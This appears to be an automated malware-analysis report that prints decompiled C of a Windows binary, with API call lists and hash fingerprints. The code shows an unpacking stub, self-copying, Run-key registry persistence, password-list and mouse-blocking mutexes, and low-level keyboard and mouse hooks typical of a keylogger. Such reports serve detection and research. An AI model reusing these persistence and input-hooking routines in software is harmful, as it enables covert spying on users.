                                    				_t143 =  *0x40d208; // 0x40e898
                                    				_push( *_t143);
                                    				E00401E10();
                                    				_t402 =  *((char*)(_v20 + E00401D50(_v20) - 1)) - 0x5c;
                                    				if(_t402 != 0) {
                                    					E00401D58( &_v20, 0x407078);
                                    				}
                                    				_t317 =  *0x40d20c; // 0x40e89c
                                    				E00401D9C( &_v24,  *_t317, _v20);
                                    				E00404740(_v16, _t313,  &_v44, _t391, _t393, _t402);
                                    				_push(_v44);
                                    				E00404740(_v8, _t313,  &_v48, _t391, _t393, _t402);
                                    				_pop(_t154);
                                    				E00401E94(_t154, _v48);
                                    				if(_t402 == 0) {
                                    					L21:
                                    					E00401B14(_t313, _v8);
                                    					goto L40;
                                    				} else {
                                    					E00404740(_v24, _t313,  &_v52, _t391, _t393, _t402);
                                    					_push(_v52);
                                    					E00404740(_v8, _t313,  &_v56, _t391, _t393, _t402);
                                    					_pop(_t166);
                                    					E00401E94(_t166, _v56);
                                    					if(_t402 != 0) {
                                    						_t169 = E00401F48(_v16);
                                    						_t394 = E00401F48(_v8);
                                    						_t172 = CopyFileA(_t394, _t169, 0);
                                    						__eflags = _t172 - 1;
                                    						asm("sbb eax, eax");
                                    						__eflags = _t172 + 1 - 1;
                                    						if(_t172 + 1 != 1) {
                                    							E00401CAC( &_v60, E00401F48(_v20));
                                    							E00406684(_v60, _t313, __eflags);
                                    							_t392 = E00401F48(_v24);
                                    							E00401CAC( &_v64, _t392);
                                    							E00405A28(_v64, _t313, _t392, _t394, __eflags);
                                    							_t186 = CopyFileA(_t394, _t392, 0);
                                    							__eflags = _t186 - 1;
                                    							asm("sbb eax, eax");
                                    							__eflags = _t186 + 1 - 1;
                                    							if(_t186 + 1 != 1) {
                                    								E00401B14(_t313, _v8);
                                    							} else {
                                    								E00401B14(_t313, _v24);
                                    							}
                                    						} else {
                                    							E00401B14(_t313, _v16);
                                    						}
                                    						_t190 =  *0x40d1ec; // 0x40e8ac
                                    						__eflags =  *_t190;
                                    						if( *_t190 != 0) {
                                    							_t248 =  *0x40d1ec; // 0x40e8ac
                                    							E00401CAC( &_v72, E00401F48( *_t248));
                                    							E00406088(0x80000002, _t313, _v72, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v68, 0);
                                    							E00401E94(_v68,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v76, E00401F48( *_t313));
                                    								_t284 =  *0x40d1ec; // 0x40e8ac
                                    								E00401CAC( &_v80, E00401F48( *_t284));
                                    								E00405C4C(0x80000002, _t313, _v80, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v76);
                                    							}
                                    							_t258 =  *0x40d1ec; // 0x40e8ac
                                    							E00401CAC( &_v88, E00401F48( *_t258));
                                    							E00406088(0x80000001, _t313, _v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v84, 0);
                                    							E00401E94(_v84,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v92, E00401F48( *_t313));
                                    								_t272 =  *0x40d1ec; // 0x40e8ac
                                    								E00401CAC( &_v96, E00401F48( *_t272));
                                    								E00405C4C(0x80000001, _t313, _v96, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v92);
                                    							}
                                    						}
                                    						_t191 =  *0x40d1d8; // 0x40e8a4
                                    						__eflags =  *_t191;
                                    						if( *_t191 != 0) {
                                    							_t226 =  *0x40d1d8; // 0x40e8a4
                                    							E00401CAC( &_v104, E00401F48( *_t226));
                                    							E00406088(0x80000002, _t313, _v104, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v100, 0);
                                    							E00401E94(_v100,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v108, E00401F48( *_t313));
                                    								_t240 =  *0x40d1d8; // 0x40e8a4
                                    								E00401CAC( &_v112, E00401F48( *_t240));
                                    								E00405C4C(0x80000002, _t313, _v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v108);
                                    							}
                                    						}
                                    						_t192 =  *0x40d1e0; // 0x40e8a8
                                    						__eflags =  *_t192;
                                    						if( *_t192 != 0) {
                                    							_t204 =  *0x40d1e0; // 0x40e8a8
                                    							E00401CAC( &_v120, E00401F48( *_t204));
                                    							E00406088(0x80000001, _t313, _v120, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v116, 0);
                                    							E00401E94(_v116,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v124, E00401F48( *_t313));
                                    								_t218 =  *0x40d1e0; // 0x40e8a8
                                    								E00401CAC( &_v128, E00401F48( *_t218));
                                    								E00405C4C(0x80000001, _t313, _v128, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v124);
                                    							}
                                    						}
                                    						_t193 =  *0x40d1e4; // 0x40e8a0
                                    						__eflags =  *_t193;
                                    						if( *_t193 != 0) {
                                    							_push(0x4070fc);
                                    							_push(E00406840(1));
                                    							_push(E00401F48( *_t313));
                                    							_t198 =  *0x40d1e4; // 0x40e8a0
                                    							_t200 = E00401F48( *_t198);
                                    							_pop(_t321);
                                    							_pop(_t201);
                                    							E00406ADC(_t201, _t321, _t200, __eflags);
                                    						}
                                    						L40:
                                    						_pop(_t351);
                                    						 *[fs:eax] = _t351;
                                    						_push(E00407068);
                                    						return E00401AE4( &_v128, 0x1f);
                                    					}
                                    					goto L21;
                                    				}
                                    			}

                                    0x00406b54
                                    0x00406b54
                                    0x00406b55
                                    0x00406b57
                                    0x00406b5c
                                    0x00406b5c
                                    0x00406b5e
                                    0x00406b60
                                    0x00406b60
                                    0x00406b63
                                    0x00406b65
                                    0x00406b66
                                    0x00406b67
                                    0x00406b69
                                    0x00406b6f
                                    0x00406b76
                                    0x00406b77
                                    0x00406b7c
                                    0x00406b7f
                                    0x00406b87
                                    0x00406b8c
                                    0x00406b91
                                    0x00406b94
                                    0x00406ba3
                                    0x00406ba8
                                    0x00406bab
                                    0x00406bba
                                    0x00406bbf
                                    0x00406bc2
                                    0x00406bce
                                    0x00406bd3
                                    0x00406bd6
                                    0x00406be2
                                    0x00406be9
                                    0x00406bee
                                    0x00406bf4
                                    0x00406bf6
                                    0x00406bfb
                                    0x00406bfd
                                    0x00406c07
                                    0x00406c0c
                                    0x00406c14
                                    0x00406c1c
                                    0x00406c2e
                                    0x00406c36
                                    0x00406bd8
                                    0x00406bdb
                                    0x00406bdb
                                    0x00406bc4
                                    0x00406bc7
                                    0x00406bc7
                                    0x00406bad
                                    0x00406bb0
                                    0x00406bb0
                                    0x00406b96
                                    0x00406b99
                                    0x00406b99
                                    0x00406c4b
                                    0x00406c55
                                    0x00406c55
                                    0x00406c5d
                                    0x00406c65
                                    0x00406c6d
                                    0x00406c72
                                    0x00406c75
                                    0x00406c7a
                                    0x00406c84
                                    0x00406c84
                                    0x00406c89
                                    0x00406c97
                                    0x00406ca9
                                    0x00406cb1
                                    0x00406cc3
                                    0x00406ccb
                                    0x00406cd3
                                    0x00406cd8
                                    0x00406cdb
                                    0x00406ce0
                                    0x00406ce5
                                    0x00406cef
                                    0x00406cff
                                    0x00406d04
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d13
                                    0x00406d21
                                    0x00406d2c
                                    0x00406d34
                                    0x00406d3b
                                    0x00406d43
                                    0x00406d44
                                    0x00406d49
                                    0x00406d70
                                    0x00406d75
                                    0x00000000
                                    0x00406d4b
                                    0x00406d51
                                    0x00406d59
                                    0x00406d60
                                    0x00406d68
                                    0x00406d69
                                    0x00406d6e
                                    0x00406d84
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9a
                                    0x00406d9d
                                    0x00406da0
                                    0x00406da2
                                    0x00406dbd
                                    0x00406dc5
                                    0x00406dd2
                                    0x00406dd9
                                    0x00406de1
                                    0x00406dea
                                    0x00406def
                                    0x00406df2
                                    0x00406df5
                                    0x00406df7
                                    0x00406e0a
                                    0x00406df9
                                    0x00406dfe
                                    0x00406dfe
                                    0x00406da4
                                    0x00406da9
                                    0x00406da9
                                    0x00406e0f
                                    0x00406e14
                                    0x00406e17
                                    0x00406e23
                                    0x00406e34
                                    0x00406e46
                                    0x00406e50
                                    0x00406e55
                                    0x00406e63
                                    0x00406e6c
                                    0x00406e7d
                                    0x00406e8f
                                    0x00406e8f
                                    0x00406e9a
                                    0x00406eab
                                    0x00406ebd
                                    0x00406ec7
                                    0x00406ecc
                                    0x00406eda
                                    0x00406ee3
                                    0x00406ef4
                                    0x00406f06
                                    0x00406f06
                                    0x00406ecc
                                    0x00406f0b
                                    0x00406f10
                                    0x00406f13
                                    0x00406f1b
                                    0x00406f2c
                                    0x00406f3e
                                    0x00406f48
                                    0x00406f4d
                                    0x00406f5b
                                    0x00406f64
                                    0x00406f75
                                    0x00406f87
                                    0x00406f87
                                    0x00406f4d
                                    0x00406f8c
                                    0x00406f91
                                    0x00406f94
                                    0x00406f9c
                                    0x00406fad
                                    0x00406fbf
                                    0x00406fc9
                                    0x00406fce
                                    0x00406fdc
                                    0x00406fe5
                                    0x00406ff6
                                    0x00407008
                                    0x00407008
                                    0x00406fce
                                    0x0040700d
                                    0x00407012
                                    0x00407015
                                    0x00407017
                                    0x00407028
                                    0x00407030
                                    0x00407031
                                    0x00407038
                                    0x0040703f
                                    0x00407040
                                    0x00407041
                                    0x00407041
                                    0x00407046
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x00407060
                                    0x00407060
                                    0x00000000
                                    0x00406d6e

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406D95
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406DEA
                                      • Part of subcall function 00406088: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                      • Part of subcall function 00406088: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                      • Part of subcall function 00405C4C: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                      • Part of subcall function 00405C4C: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                      • Part of subcall function 00405C4C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCopyFileQuery$CreateOpen
                                    • String ID: 4h@$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run
                                    • API String ID: 1469814539-1189044031
                                    • Opcode ID: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction ID: 0337d0d0e41828abccd6a10b42b8af73d9b7eafca3f8209fdc2fdaca8a3f3fd1
                                    • Opcode Fuzzy Hash: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction Fuzzy Hash: 13E1FC34A041099FDB11EBA9C881A9EB3B5AF45308F60417BF405BB2F6DB38AD45CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 31%
                                    			E004019D8() {
                                    				struct HINSTANCE__* _t24;
                                    				intOrPtr _t32;
                                    				void* _t42;
                                    
                                    				if( *0x0040E5BC != 0 ||  *0x40e024 == 0) {
                                    					L3:
                                    					if( *0x40d004 != 0) {
                                    						 *0x40d068();
                                    					}
                                    					L5:
                                    					while(1) {
                                    						if( *((char*)(0x40e5bc)) == 2 &&  *0x40d000 == 0) {
                                    							 *0x0040E5A0 = 0;
                                    						}
                                    						 *0x40d030();
                                    						if( *((char*)(0x40e5bc)) <= 1 ||  *0x40d000 != 0) {
                                    							if( *0x0040E5A4 != 0) {
                                    								 *0x40d01c();
                                    								_t32 =  *((intOrPtr*)(0x40e5a4));
                                    								_t7 = _t32 + 0x10; // 0x0
                                    								_t24 =  *_t7;
                                    								_t8 = _t32 + 4; // 0x400000
                                    								if(_t24 !=  *_t8 && _t24 != 0) {
                                    									FreeLibrary(_t24);
                                    								}
                                    							}
                                    						}
                                    						 *0x40d034();
                                    						if( *((char*)(0x40e5bc)) == 1) {
                                    							 *0x0040E5B8();
                                    						}
                                    						if( *((char*)(0x40e5bc)) != 0) {
                                    							E004019A8();
                                    						}
                                    						if( *0x40e594 == 0) {
                                    							if( *0x40e014 != 0) {
                                    								 *0x40e014();
                                    							}
                                    							ExitProcess( *0x40d000); // executed
                                    						}
                                    						memcpy(0x40e594,  *0x40e594, 0xb << 2);
                                    						_t42 = _t42 + 0xc;
                                    						0x40d000 = 0x40d000;
                                    					}
                                    				} else {
                                    					do {
                                    						 *0x40e024 = 0;
                                    						 *((intOrPtr*)( *0x40e024))();
                                    					} while ( *0x40e024 != 0);
                                    					goto L3;
                                    				}
                                    			}
                                    0x004019ef
                                    0x00401a07
                                    0x00401a0e
                                    0x00401a10
                                    0x00401a10
                                    0x00000000
                                    0x00401a16
                                    0x00401a1a
                                    0x00401a23
                                    0x00401a23
                                    0x00401a26
                                    0x00401a30
                                    0x00401a3c
                                    0x00401a3e
                                    0x00401a44
                                    0x00401a47
                                    0x00401a47
                                    0x00401a4a
                                    0x00401a4d
                                    0x00401a54
                                    0x00401a54
                                    0x00401a4d
                                    0x00401a3c
                                    0x00401a59
                                    0x00401a63
                                    0x00401a65
                                    0x00401a65
                                    0x00401a6c
                                    0x00401a6e
                                    0x00401a6e
                                    0x00401a76
                                    0x00401a7f
                                    0x00401a81
                                    0x00401a81
                                    0x00401a8a
                                    0x00401a8a
                                    0x00401a9b
                                    0x00401a9b
                                    0x00401a9d
                                    0x00401a9d
                                    0x004019f6
                                    0x004019f6
                                    0x004019fc
                                    0x00401a00
                                    0x00401a02
                                    0x00000000
                                    0x004019f6

                                    APIs
                                    • FreeLibrary.KERNEL32(00400000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A54
                                    • ExitProcess.KERNEL32(00000000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitFreeLibraryProcess
                                    • String ID: @&@$@&@$D0@
                                    • API String ID: 1404682716-1618351410
                                    • Opcode ID: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction ID: 5263b8d098c20f51001af61e3d55436e18b8afc55997b24df4f1e0aa037ee43b
                                    • Opcode Fuzzy Hash: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction Fuzzy Hash: 4521AF70A022418FEB209FA5C9887537BE5AF44318F284476D848AA2E2C77CCCC5CF5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			_entry_(void* __eflags, void* __fp0) {
                                    				char _v24;
                                    				char _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v128;
                                    				void* _t64;
                                    				void* _t65;
                                    				signed int _t66;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				signed int _t70;
                                    				signed int _t71;
                                    				unsigned int _t72;
                                    				char _t82;
                                    				signed char* _t84;
                                    				long _t85;
                                    				char* _t88;
                                    				void* _t92;
                                    				long _t93;
                                    				void* _t95;
                                    				void* _t98;
                                    				intOrPtr* _t108;
                                    				void* _t111;
                                    				long _t112;
                                    				char* _t123;
                                    				intOrPtr* _t136;
                                    				long _t140;
                                    				intOrPtr* _t143;
                                    				long _t147;
                                    				intOrPtr* _t150;
                                    				long _t154;
                                    				struct HINSTANCE__* _t157;
                                    				struct HINSTANCE__* _t160;
                                    				signed int _t163;
                                    				signed int _t255;
                                    				signed int _t259;
                                    				signed int _t260;
                                    				signed int _t261;
                                    				signed int _t262;
                                    				void* _t266;
                                    				void* _t267;
                                    				void* _t268;
                                    				void* _t269;
                                    				char* _t271;
                                    				signed int _t272;
                                    				signed int _t274;
                                    				void* _t277;
                                    				void* _t278;
                                    				void* _t279;
                                    				void* _t280;
                                    				void* _t281;
                                    				void* _t282;
                                    				void* _t283;
                                    				intOrPtr* _t285;
                                    				intOrPtr _t291;
                                    				signed int _t316;
                                    				unsigned int* _t317;
                                    				CHAR* _t319;
                                    				void* _t320;
                                    				char* _t321;
                                    				signed int _t322;
                                    				unsigned int* _t323;
                                    				signed int _t324;
                                    				struct HINSTANCE__* _t325;
                                    				unsigned int _t326;
                                    				intOrPtr _t327;
                                    				DWORD* _t328;
                                    				intOrPtr _t329;
                                    				void* _t330;
                                    				signed int _t332;
                                    				void* _t335;
                                    
                                    				_t335 = __fp0;
                                    				_t330 = __eflags;
                                    				asm("pushad");
                                    				_t322 = 0x412000;
                                    				_t1 = _t322 - 0x11000; // 0x401000
                                    				_t316 = _t1;
                                    				_push(_t316);
                                    				_t325 = _t324 | 0xffffffff;
                                    				while(1) {
                                    					_t259 =  *_t322;
                                    					_t322 = _t322 - 0xfffffffc;
                                    					asm("adc ebx, ebx");
                                    					do {
                                    						if(_t330 < 0) {
                                    							_t64 =  *_t322;
                                    							_t322 = _t322 + 1;
                                    							 *_t316 = _t64;
                                    							_t316 = _t316 + 1;
                                    							__eflags = _t316;
                                    							goto L47;
                                    						}
                                    						_t65 = 1;
                                    						while(1) {
                                    							_t260 = _t259 + _t259;
                                    							if(_t260 == 0) {
                                    								_t260 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t261 = _t260 + _t260;
                                    							_t332 = _t261;
                                    							if(_t332 >= 0) {
                                    								goto L56;
                                    							}
                                    							L54:
                                    							if(_t332 != 0) {
                                    								L62:
                                    								_t272 = 0;
                                    								_t66 = _t65 - 3;
                                    								__eflags = _t66;
                                    								if(_t66 < 0) {
                                    									_t261 = _t261 + _t261;
                                    									__eflags = _t261;
                                    									if(__eflags == 0) {
                                    										_t261 =  *_t322;
                                    										_t322 = _t322 - 0xfffffffc;
                                    										asm("adc ebx, ebx");
                                    									}
                                    									L67:
                                    									if(__eflags < 0) {
                                    										L59:
                                    										_t259 = _t261 + _t261;
                                    										__eflags = _t259;
                                    										if(_t259 == 0) {
                                    											_t259 =  *_t322;
                                    											_t322 = _t322 - 0xfffffffc;
                                    											asm("adc ebx, ebx");
                                    										}
                                    										asm("adc ecx, ecx");
                                    										L77:
                                    										__eflags = _t325 - 0xfffffb00;
                                    										asm("adc ecx, 0x2");
                                    										_t285 = _t325 + _t316;
                                    										__eflags = _t325 - 0xfffffffc;
                                    										if(_t325 <= 0xfffffffc) {
                                    											do {
                                    												_t67 =  *_t285;
                                    												_t285 = _t285 + 4;
                                    												 *_t316 = _t67;
                                    												_t316 = _t316 + 4;
                                    												_t272 = _t272 - 4;
                                    												__eflags = _t272;
                                    											} while (_t272 > 0);
                                    											_t316 = _t316 + _t272;
                                    											break;
                                    										} else {
                                    											goto L78;
                                    										}
                                    										do {
                                    											L78:
                                    											_t68 =  *_t285;
                                    											_t285 = _t285 + 1;
                                    											 *_t316 = _t68;
                                    											_t316 = _t316 + 1;
                                    											_t272 = _t272 - 1;
                                    											__eflags = _t272;
                                    										} while (_t272 != 0);
                                    										break;
                                    									}
                                    									_t272 = _t272 + 1;
                                    									_t261 = _t261 + _t261;
                                    									__eflags = _t261;
                                    									if(__eflags == 0) {
                                    										_t261 =  *_t322;
                                    										_t322 = _t322 - 0xfffffffc;
                                    										asm("adc ebx, ebx");
                                    									}
                                    									if(__eflags < 0) {
                                    										goto L59;
                                    									} else {
                                    										goto L71;
                                    										do {
                                    											do {
                                    												L71:
                                    												_t262 = _t261 + _t261;
                                    												__eflags = _t262;
                                    												if(_t262 == 0) {
                                    													_t262 =  *_t322;
                                    													_t322 = _t322 - 0xfffffffc;
                                    													asm("adc ebx, ebx");
                                    												}
                                    												asm("adc ecx, ecx");
                                    												_t261 = _t262 + _t262;
                                    												__eflags = _t261;
                                    											} while (__eflags >= 0);
                                    											if(__eflags != 0) {
                                    												break;
                                    											}
                                    											_t261 =  *_t322;
                                    											_t322 = _t322 - 0xfffffffc;
                                    											__eflags = _t322;
                                    											asm("adc ebx, ebx");
                                    										} while (_t322 >= 0);
                                    										_t272 = _t272 + 2;
                                    										__eflags = _t272;
                                    										goto L77;
                                    									}
                                    								}
                                    								_t70 =  *_t322;
                                    								_t322 = _t322 + 1;
                                    								_t71 = _t70 ^ 0xffffffff;
                                    								__eflags = _t71;
                                    								if(__eflags == 0) {
                                    									_pop(_t323);
                                    									_t317 = _t323;
                                    									goto L83;
                                    									do {
                                    										do {
                                    											L83:
                                    											_t72 =  *_t317;
                                    											_t317 =  &(_t317[0]);
                                    											__eflags = _t72 - 0xe8 - 1;
                                    										} while (_t72 - 0xe8 > 1);
                                    										__eflags =  *_t317 - 1;
                                    									} while ( *_t317 != 1);
                                    									asm("rol eax, 0x10");
                                    									 *_t317 = ( *_t317 >> 8) - _t317 + _t323;
                                    									__eflags =  &(_t317[1]);
                                    									asm("loop 0xffffffdb");
                                    									_t50 =  &(_t323[0x13c00]); // 0x450000
                                    									_t319 = _t50;
                                    									while(1) {
                                    										L86:
                                    										_t82 =  *_t319;
                                    										__eflags = _t82;
                                    										if(_t82 == 0) {
                                    											break;
                                    										}
                                    										_t51 =  &(_t319[4]); // 0xf1ec
                                    										_t271 = _t323 +  *_t51;
                                    										_t321 =  &(_t319[8]);
                                    										__eflags = _t321;
                                    										_t325 = LoadLibraryA( &(_t323[0x156c2]) + _t82);
                                    										while(1) {
                                    											_t319 =  &(_t321[1]);
                                    											_t255 =  *_t321;
                                    											__eflags = _t255;
                                    											if(_t255 == 0) {
                                    												goto L86;
                                    											}
                                    											asm("repne scasb");
                                    											_t82 = GetProcAddress(_t325, _t319);
                                    											__eflags = _t82;
                                    											if(_t82 == 0) {
                                    												ExitProcess();
                                    											}
                                    											 *_t271 = _t82;
                                    											_t271 =  &(_t271[4]);
                                    										}
                                    									}
                                    									_t326 = _t323[0x156f6];
                                    									_t59 = _t323 - 0x1000; // 0x400000
                                    									_t320 = _t59;
                                    									VirtualProtect(_t320, 0x1000, 4, _t328);
                                    									_t60 = _t320 + 0x21f; // 0x40021f
                                    									_t84 = _t60;
                                    									 *_t84 =  *_t84 & 0x0000007f;
                                    									_t61 =  &(_t84[0x28]);
                                    									 *_t61 = _t84[0x28] & 0x0000007f;
                                    									__eflags =  *_t61;
                                    									_t85 = _t82;
                                    									_push(_t85);
                                    									VirtualProtect(_t320, 0x1000, _t85, _t328); // executed
                                    									asm("popad");
                                    									_t88 =  &_v128;
                                    									do {
                                    										_push(0);
                                    										__eflags = _t328 - _t88;
                                    									} while (_t328 != _t88);
                                    									_t329 = _t328 - 0xffffff80;
                                    									_push(_t326);
                                    									_t327 = _t329;
                                    									_t274 = 0xb;
                                    									do {
                                    										_push(0);
                                    										_push(0);
                                    										_t274 = _t274 - 1;
                                    										__eflags = _t274;
                                    									} while (_t274 != 0);
                                    									_push(0x1000);
                                    									E00403418(0x40bb04);
                                    									_push(_t327);
                                    									_push(0x40c0c4);
                                    									_push( *[fs:eax]);
                                    									 *[fs:eax] = _t329;
                                    									_t92 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
                                    									_t266 = _t92;
                                    									_t93 = GetLastError();
                                    									__eflags = _t93 - 0xb7;
                                    									if(_t93 != 0xb7) {
                                    										CloseHandle(_t266); // executed
                                    									} else {
                                    										CloseHandle(_t266);
                                    										Sleep(0x2ee0);
                                    									}
                                    									_t95 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
                                    									_t267 = _t95;
                                    									__eflags = GetLastError() - 0xb7;
                                    									if(__eflags != 0) {
                                    										CloseHandle(_t267);
                                    										_t98 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
                                    										_t268 = _t98;
                                    										__eflags = GetLastError() - 0xb7;
                                    										if(__eflags != 0) {
                                    											CloseHandle(_t268);
                                    											L27:
                                    											E004013A4(1,  &_v80);
                                    											_t287 = "Restart";
                                    											E00401E94(_v80, "Restart");
                                    											if(__eflags != 0) {
                                    												Sleep(0x3e8); // executed
                                    											}
                                    											E00404604(_t274, __eflags);
                                    											E0040491C();
                                    											E0040B118(_t287, _t320, _t323);
                                    											_t108 =  *0x40d204; // 0x40e8f8
                                    											_t111 = E00403568(0, 0, E00401F48( *_t108)); // executed
                                    											_t269 = _t111;
                                    											_t112 = GetLastError();
                                    											__eflags = _t112 - 0xb7;
                                    											if(_t112 != 0xb7) {
                                    												CloseHandle(_t269); // executed
                                    											} else {
                                    												CloseHandle(_t269);
                                    												Sleep(0x3e8);
                                    												_t136 =  *0x40d204; // 0x40e8f8
                                    												_t269 = E00403568(0, 0, E00401F48( *_t136));
                                    												_t140 = GetLastError();
                                    												__eflags = _t140 - 0xb7;
                                    												if(_t140 != 0xb7) {
                                    													CloseHandle(_t269);
                                    												} else {
                                    													CloseHandle(_t269);
                                    													Sleep(0x3e8);
                                    													_t143 =  *0x40d204; // 0x40e8f8
                                    													_t269 = E00403568(0, 0, E00401F48( *_t143));
                                    													_t147 = GetLastError();
                                    													__eflags = _t147 - 0xb7;
                                    													if(_t147 != 0xb7) {
                                    														CloseHandle(_t269);
                                    													} else {
                                    														CloseHandle(_t269);
                                    														Sleep(0x3e8);
                                    														_t150 =  *0x40d204; // 0x40e8f8
                                    														_t269 = E00403568(0, 0, E00401F48( *_t150));
                                    														_t154 = GetLastError();
                                    														__eflags = _t154 - 0xb7;
                                    														if(_t154 != 0xb7) {
                                    															CloseHandle(_t269);
                                    														} else {
                                    															ExitProcess(0);
                                    														}
                                    													}
                                    												}
                                    											}
                                    											__eflags =  *((char*)( *0x40d1dc)) - 1;
                                    											if( *((char*)( *0x40d1dc)) != 1) {
                                    												__eflags = 0;
                                    												E004013A4(0, 0x40f1e8);
                                    											} else {
                                    												E004013A4(0,  &_v88);
                                    												E00406B54(_v88, _t269,  &_v84, _t320, _t323); // executed
                                    												E00401B14(0x40f1e8, _v84);
                                    											}
                                    											E00406008( &_v92);
                                    											E00401D58( &_v92, "XX--XX--XX.txt");
                                    											E0040B93C( *0x40f1e8, _t269, _v92, _t320, _t323, __eflags);
                                    											_t123 =  *0x40d214; // 0x40e8f4
                                    											__eflags =  *_t123 - 1;
                                    											if(__eflags == 0) {
                                    												E0040B7FC(_t269, _t320, _t323, __eflags);
                                    												Sleep(0x3e8); // executed
                                    											}
                                    											E0040B3C0(_t269, _t274, _t320, _t323); // executed
                                    											L44:
                                    											__eflags = 0;
                                    											_pop(_t291);
                                    											 *[fs:eax] = _t291;
                                    											_push(0x40c0cb);
                                    											return E00401AE4( &_v92, 0x12);
                                    										}
                                    										CloseHandle(_t268);
                                    										_t157 =  *0x40e670; // 0x400000
                                    										SetWindowsHookExA(0xd, E0040B0B8, _t157, 0);
                                    										_t160 =  *0x40e670; // 0x400000
                                    										SetWindowsHookExA(0xe, E0040B108, _t160, 0);
                                    										while(1) {
                                    											_t163 = E0040BA84(__eflags);
                                    											__eflags = _t163;
                                    											if(_t163 != 0) {
                                    												break;
                                    											}
                                    											E00405918();
                                    										}
                                    										ExitProcess(0);
                                    										goto L27;
                                    									}
                                    									CloseHandle(_t267);
                                    									E00409AD4( &_v24, _t267, _t323, __eflags);
                                    									E00401B14(0x40f1ec, _v24);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v28);
                                    										E00401D58( &_v28, "NOIP.abc");
                                    										_pop(_t283);
                                    										E00405D70(_v28, _t267, _t283,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409D28( &_v32, _t267, _t320, _t323);
